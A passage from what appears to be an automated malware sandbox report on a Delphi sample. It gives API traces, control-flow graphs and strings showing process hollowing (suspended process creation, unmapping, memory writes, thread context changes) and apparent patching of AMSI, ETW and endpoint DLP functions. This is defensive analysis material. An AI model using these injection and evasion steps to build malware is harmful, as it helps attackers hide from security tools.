                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,02904548,00001000,00000040,ScanBuffer,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC,UacScan,02900BA8,028C8FEC,ScanBuffer,02900BA8,028C8FEC), ref: 028C681D
                                                                                                                              • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                              • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                              • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                            • EnumSystemLocalesA.KERNELBASE(029045D8,00000000), ref: 028C6B4F
                                                                                                                              • Part of subcall function 028BC3F8: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 028BC437
                                                                                                                              • Part of subcall function 028BC3F8: NtCreateFile.NTDLL(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000), ref: 028BC471
                                                                                                                              • Part of subcall function 028BC3F8: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 028BC49E
                                                                                                                              • Part of subcall function 028BC3F8: NtClose.NTDLL(?), ref: 028BC4A7
                                                                                                                            • ExitProcess.KERNEL32(00000000,ScanBuffer,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC,Initialize,02900BA8,028C8FEC,ScanString,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC), ref: 028C8B96
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFileHandleModulePathProcProcess$AllocateCloseCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_SystemVirtualWrite
                                                                                                                            • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                            • API String ID: 60065011-2845693168
                                                                                                                            • Opcode ID: bf50a689c4b957ded20addede114de4147a5c77e09359bbd2a02a0e3a6ee907a
                                                                                                                            • Instruction ID: 51069176a49b1e63aa79d652d5b78f9ed8209a6c7d71cfdc0b3c4c4ef427d0bd
                                                                                                                            • Opcode Fuzzy Hash: bf50a689c4b957ded20addede114de4147a5c77e09359bbd2a02a0e3a6ee907a
                                                                                                                            • Instruction Fuzzy Hash: 5733F83DA505588FEF11EB68D8909DEB3B6AF85301F2444E5E009E7715DFB0AE868F12
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028B7F48 Relevance: 41.9, APIs: 8, Strings: 15, Instructions: 1602nativethreadprocessCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 8717 28b7f48-28b7f4b 8718 28b7f50-28b7f55 8717->8718 8718->8718 8719 28b7f57-28b803e call 28a4954 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 8718->8719 8750 28b99ab-28b9a15 call 28a44c4 * 2 call 28a4c24 call 28a44c4 call 28a44a0 call 28a44c4 * 2 8719->8750 8751 28b8044-28b811f call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 8719->8751 8751->8750 8794 28b8125-28b844d call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a3098 * 2 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 call 28a4db4 CreateProcessAsUserW 8751->8794 8901 28b844f-28b84bb call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 8794->8901 8902 28b84c0-28b87e6 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2ee0 call 28a2f08 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 GetThreadContext 8794->8902 8901->8902 8902->8750 9010 28b87ec-28b8a4f call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 NtReadVirtualMemory 8902->9010 9081 28b8d5c-28b8dc8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 9010->9081 9082 28b8a55-28b8bbe call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 NtUnmapViewOfSection 9010->9082 9110 28b8dcd-28b8f4d call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7968 9081->9110 9168 28b8be8-28b8c54 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 9082->9168 9169 28b8bc0-28b8bdc call 28b7968 9082->9169 9110->8750 9213 28b8f53-28b904c call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7e58 9110->9213 9176 28b8c59-28b8d50 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7968 9168->9176 9173 28b8be1-28b8be6 9169->9173 9173->9176 9248 28b8d55-28b8d5a 9176->9248 9262 28b904e-28b909b call 28b7d50 call 28b7d44 9213->9262 9263 28b90a0-28b99a6 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 NtWriteVirtualMemory call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 NtWriteVirtualMemory call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 SetThreadContext NtResumeThread call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2c2c call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7ac0 * 3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7ac0 * 2 call 28a4824 call 28a4964 call 28a47b0 call 28a4964 call 28b7ac0 call 28a4824 call 28a4964 call 28a47b0 call 28a4964 call 28b7ac0 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 9213->9263 9248->9110 9262->9263 9263->8750
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A,?), ref: 028B7C18
                                                                                                                              • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                              • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(0290434C,00000000), ref: 028B7C37
                                                                                                                            • CreateProcessAsUserW.ADVAPI32(02904368,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02904398,02904388,OpenSession,02904360,028B9A30,ScanString,02904360), ref: 028B8446
                                                                                                                            • GetThreadContext.KERNEL32(0290438C,029043DC,ScanString,02904360,028B9A30,UacInitialize,02904360,028B9A30,ScanBuffer,02904360,028B9A30,ScanBuffer,02904360,028B9A30,UacInitialize,02904360), ref: 028B87DF
                                                                                                                            • NtReadVirtualMemory.NTDLL(02904388,02904478,029044B0,00000004,029044B8), ref: 028B8A3C
                                                                                                                            • NtUnmapViewOfSection.NTDLL(02904388,00000000), ref: 028B8BB7
                                                                                                                              • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                              • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                              • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                            • NtWriteVirtualMemory.NTDLL(02904388,029044B4,00000000,029044C4,029044B8), ref: 028B920B
                                                                                                                            • NtWriteVirtualMemory.NTDLL(02904388,02904478,029044B4,00000004,029044B8), ref: 028B937E
                                                                                                                            • SetThreadContext.KERNEL32(0290438C,029043DC,ScanBuffer,02904360,028B9A30,ScanString,02904360,028B9A30,Initialize,02904360,028B9A30,02904388,02904478,029044B4,00000004,029044B8), ref: 028B94F4
                                                                                                                            • NtResumeThread.NTDLL(0290438C,00000000), ref: 028B9501
                                                                                                                              • Part of subcall function 028B7AC0: LoadLibraryW.KERNEL32(bcrypt,028B9A30,Initialize,02904360,028B9A30,UacScan,02904360,028B9A30,UacInitialize,02904360,028B9A30,0290438C,029043DC,ScanString,02904360,028B9A30), ref: 028B7AD2
                                                                                                                              • Part of subcall function 028B7AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028B7ADF
                                                                                                                              • Part of subcall function 028B7AC0: NtWriteVirtualMemory.NTDLL(02904388,00000000,?,00000001,?), ref: 028B7AF6
                                                                                                                              • Part of subcall function 028B7AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,028B9A30,Initialize,02904360,028B9A30,UacScan,02904360,028B9A30,UacInitialize,02904360,028B9A30,0290438C,029043DC), ref: 028B7B05
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                            • API String ID: 2533507481-2367850715
                                                                                                                            • Opcode ID: a74b2d5edb57ec2e681355e384dbb8f8eca024813fdfde045395509fad937027
                                                                                                                            • Instruction ID: 1908dd5983be59f54e8072345ddbda7d44a3d169e94f4ed3e9ad660ca4db8887
                                                                                                                            • Opcode Fuzzy Hash: a74b2d5edb57ec2e681355e384dbb8f8eca024813fdfde045395509fad937027
                                                                                                                            • Instruction Fuzzy Hash: 7AE22E3DA402688FEF11EB68D890ADEB3B6AF46700F1094A5D109F7315DEB0AE55CF52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028B7F46 Relevance: 41.8, APIs: 8, Strings: 15, Instructions: 1553nativeprocessthreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 9536 28b7f46-28b7f4b 9538 28b7f50-28b7f55 9536->9538 9538->9538 9539 28b7f57-28b803e call 28a4954 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 9538->9539 9570 28b99ab-28b9a15 call 28a44c4 * 2 call 28a4c24 call 28a44c4 call 28a44a0 call 28a44c4 * 2 9539->9570 9571 28b8044-28b811f call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 9539->9571 9571->9570 9614 28b8125-28b844d call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a3098 * 2 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 call 28a4db4 CreateProcessAsUserW 9571->9614 9721 28b844f-28b84bb call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 9614->9721 9722 28b84c0-28b87e6 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2ee0 call 28a2f08 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 GetThreadContext 9614->9722 9721->9722 9722->9570 9830 28b87ec-28b8a4f call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 NtReadVirtualMemory 9722->9830 9901 28b8d5c-28b8dc8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 9830->9901 9902 28b8a55-28b8bbe call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 NtUnmapViewOfSection 9830->9902 9930 28b8dcd-28b8f4d call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7968 9901->9930 9988 28b8be8-28b8c54 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 9902->9988 9989 28b8bc0-28b8be6 call 28b7968 9902->9989 9930->9570 10033 28b8f53-28b904c call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7e58 9930->10033 9996 28b8c59-28b8d5a call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7968 9988->9996 9989->9996 9996->9930 10082 28b904e-28b909b call 28b7d50 call 28b7d44 10033->10082 10083 28b90a0-28b99a6 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 NtWriteVirtualMemory call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 NtWriteVirtualMemory call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 SetThreadContext NtResumeThread call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2c2c call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7ac0 * 3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28b7ac0 * 2 call 28a4824 call 28a4964 call 28a47b0 call 28a4964 call 28b7ac0 call 28a4824 call 28a4964 call 28a47b0 call 28a4964 call 28b7ac0 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 10033->10083 10082->10083 10083->9570
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A,?), ref: 028B7C18
                                                                                                                              • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                              • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(0290434C,00000000), ref: 028B7C37
                                                                                                                            • CreateProcessAsUserW.ADVAPI32(02904368,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02904398,02904388,OpenSession,02904360,028B9A30,ScanString,02904360), ref: 028B8446
                                                                                                                            • GetThreadContext.KERNEL32(0290438C,029043DC,ScanString,02904360,028B9A30,UacInitialize,02904360,028B9A30,ScanBuffer,02904360,028B9A30,ScanBuffer,02904360,028B9A30,UacInitialize,02904360), ref: 028B87DF
                                                                                                                            • NtReadVirtualMemory.NTDLL(02904388,02904478,029044B0,00000004,029044B8), ref: 028B8A3C
                                                                                                                            • NtUnmapViewOfSection.NTDLL(02904388,00000000), ref: 028B8BB7
                                                                                                                              • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                              • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                              • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                            • API String ID: 3979268988-2367850715
                                                                                                                            • Opcode ID: 50b1894f4756c884f74c682cb992c1b8bad7e09632c90d0887b7261ceed7e59a
                                                                                                                            • Instruction ID: 4e828f773d53f2ab083432003618a40143cc8524b29aab526b9b3079f830b858
                                                                                                                            • Opcode Fuzzy Hash: 50b1894f4756c884f74c682cb992c1b8bad7e09632c90d0887b7261ceed7e59a
                                                                                                                            • Instruction Fuzzy Hash: E5E22F3DA402689FEF11EB68D890ADEB3B6AF46700F1090A5D109F7315DEB0AE55CF52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028A5A90 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184registrystringlibraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 10356 28a5a90-28a5ad1 GetModuleFileNameA RegOpenKeyExA 10357 28a5b13-28a5b56 call 28a58cc RegQueryValueExA 10356->10357 10358 28a5ad3-28a5aef RegOpenKeyExA 10356->10358 10363 28a5b7a-28a5b94 RegCloseKey 10357->10363 10364 28a5b58-28a5b74 RegQueryValueExA 10357->10364 10358->10357 10359 28a5af1-28a5b0d RegOpenKeyExA 10358->10359 10359->10357 10362 28a5b9c-28a5bcd lstrcpyn GetThreadLocale GetLocaleInfoA 10359->10362 10365 28a5bd3-28a5bd7 10362->10365 10366 28a5cb6-28a5cbd 10362->10366 10364->10363 10367 28a5b76 10364->10367 10368 28a5bd9-28a5bdd 10365->10368 10369 28a5be3-28a5bf9 lstrlen 10365->10369 10367->10363 10368->10366 10368->10369 10370 28a5bfc-28a5bff 10369->10370 10371 28a5c0b-28a5c13 10370->10371 10372 28a5c01-28a5c09 10370->10372 10371->10366 10374 28a5c19-28a5c1e 10371->10374 10372->10371 10373 28a5bfb 10372->10373 10373->10370 10375 28a5c48-28a5c4a 10374->10375 10376 28a5c20-28a5c46 lstrcpyn LoadLibraryExA 10374->10376 10375->10366 10377 28a5c4c-28a5c50 10375->10377 10376->10375 10377->10366 10378 28a5c52-28a5c82 lstrcpyn LoadLibraryExA 10377->10378 10378->10366 10379 28a5c84-28a5cb4 lstrcpyn LoadLibraryExA 10378->10379 10379->10366
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 028A5AAC
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5ACA
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5AE8
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028A5B06
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028A5B4F
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,028A5CFC,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,028A5B95,?,80000001), ref: 028A5B6D
                                                                                                                            • RegCloseKey.ADVAPI32(?,028A5B9C,00000000,00000000,00000005,00000000,028A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028A5B8F
                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028A5BAC
                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 028A5BB9
                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 028A5BBF
                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 028A5BEA
                                                                                                                            • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 028A5C31
                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 028A5C41
                                                                                                                            • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 028A5C69
